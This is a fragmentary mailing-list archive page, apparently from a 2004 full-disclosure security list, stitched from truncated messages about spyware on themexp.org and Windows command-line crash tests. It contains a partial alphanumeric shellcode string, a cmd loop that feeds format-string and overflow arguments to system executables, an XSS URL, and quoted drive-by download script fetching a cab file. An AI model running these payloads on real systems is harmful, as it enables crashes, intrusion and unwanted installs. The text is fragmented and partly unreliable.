Cool. I will also add to the discussion with an alphanumeric version written
with two others for experimentation, though it is limited in it doesn't vary
the length of the decoder stubs or encoded shellcode. spoonm is doing a
separate version--I think based on Berend's alpha--that will. Also, I
file
ATPartners.cab
[ 3:25AM]
ATPartners.cab: Microsoft Cabinet file, 52795 bytes, 2 files
cabextract
ATPartners.cab
[ 3:25AM]
ATPartners.cab: WARNING; poss
Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back
together:
---
set
!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLK
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
=
FreeBSD-SA-04:15.sysconsSecurity Advisory
The FreeBSD Project
Topic: B
>Ok, how to delete that crap? Any idea?
from http://www.ss64.com/nt/del.html
Files are sometimes created with the reserved names: CON, AUX, COM1, COM2,
COM3, COM4, LPT1, LPT2, LPT3, PRN, NUL
To delete these use the syntax: DEL \\.\C:\somedir\LPT1
same idea using RMDIR to get rid of the directory
Gossi wrote:
--__--__--
Message: 12
Date: Mon, 4 Oct 2004 10:15:46 -0500 (CDT)
From: Gossi The Dog <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Spyware installs with no interaction in IE
Hi group,
> I don't think your super AV will detect the "eicar
> test string file" withing "NULL.con" folder??? :)
My AV detected the string... www.free-av.de H+BEDV Datentechnick GmbH.
> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.
Ok, how to delete
&view=date&page=&cat=&name=blue+biohazard.zip">http://themexp.org//preview.php?mid=72936&type=>"'>&view=date&page=&cat=&name=blue+biohazard.zip
Above is a measly example of XSS - upload any file you like if you want to the site with XSS; seems to be open to all sorts - but I just spidered the web
I do not believe the point was to show that you can chew up system
resources... although that IS a side effect. That was not the point.
Add a sleep statement in there if it makes you feel better.
-KF
Clairmont, Jan M wrote:
;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
Alex Wrote-->
---> Oooo my...
---> Got around 12 of win32 executable crashes on my Win2K server with all
---> patches...
---> This is much better tool that MS Baseline Security analyzer :-(
Alex I don't know why you would run it on a working server??.did you
want to reboot anywa
;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
;;for %i in (*.exe) do start %i AA (type
as ;;much "A"-s as cmd.exe allows on one line.)
Any system UNIX at least use to churn and eat system resources with a spawned
shell, thi
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Hi Everyone !I am running Suse 9.0 and I
have installed qmail (netqmail Ver. 1.05) amavis
(amavis-new Ver. 20030616p5-23) antivir (Ver 2.08-16) Antivir
seems to be an evaluation version. (The one that came with Suse
9.0) I donwloaded the EICAR E-Mail Test Virus but when I send
either an in
Oooo my...
Got around 12 of win32 executable crashes on my Win2K server with all
patches...
This is much better tool that MS Baseline Security analyzer :-(
- Original Message -
From: "Berend-Jan Wever" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, October 04, 2004 11:39 AM
Su
On my win2k box with SP4
atmadm.exe crashed with the format string test.
csvde.exe ipconfig.exe ldifde.exe sort.exe all crashed on the bof test.
-KF
Berend-Jan Wever wrote:
Hi all,
Wanna do a quick test to see if the programmers that wrote your windows operating
system have any clue as to what the
Yes... ThemeXP.org has this in the HTML..
http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js";>
Which calls...
http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
Which contains...
document.write('');
document_code = '\n';
d
To expand on this "About Wrap". I have posted images to this site
beforebefore the site went downhill. Some of the authors would allow
the site to wrap their images with ads (therefore making money for the
site). It appears they are now wrapping images with installed ad-ware.
It appears the n
hi,
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from
Hi all,
Wanna do a quick test to see if the programmers that wrote your windows operating
system have any clue as to what there doing ? Run these commands from cmd.exe in the
system32 directory:
for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
for %i in (*.exe) do start %i
var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';
var retry_enabled = true;
var retry_cnt=1;
executeScript(getCookie('minpopup80wu03rd'));
function executeScript(CookieExists) {
//Check if cookie exists, if it does we know the user has visited the
site wit
hi,
> I was unable to verify it, since I don't use IE, and would prefer not
> infecting myself on accident, however I did run across this:
>
> http://themexp.org/about_wrap.php
>
> Perhaps one of the themes you downloaded was bundled with the spyware?
two tiny links from there:
http://WWW.ad
nope, there is no error message when accessing this site as a user - just
a very quick flash of a pop-up going to wepdt(?).gator.something.
There doesn't appear to be any trace on this computer of any of the
files mentioned previously so i guess that you may need to be running as
admin to get
Yep Themexp.org was my wallpaper stop for a while. But it was taken over
by new owners a whlie ago about and it is turning south, into a
adware/spyware/pop-up site. Kinda sad, it was a very good site.
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf O
Aren't their still cross-scripting problems with IE still? Plus I think
the Drag and Drop exploit is still unpatched? Comments anyone?
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Harlan Carvey
> Sent: Sunday, October 03, 2004 2:37 PM
> To: [E
Interesting...
I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error messag
I was unable to verify it, since I don't use IE, and would prefer not
infecting myself on accident, however I did run across this:
http://themexp.org/about_wrap.php
Perhaps one of the themes you downloaded was bundled with the spyware?
Geraldo Rivera wrote:
themexp.org
I should have logged all t
themexp.org
I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:
SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Sys
---
Fedora Legacy Update Advisory
Synopsis: Updated libxml2 resolves security vulnerability
Advisory ID: FLSA:1324
Issue date:2004-10-04
Product: Red Hat Linux
Keywords: Sec
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 557-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 4th, 2004
29 matches
Mail list logo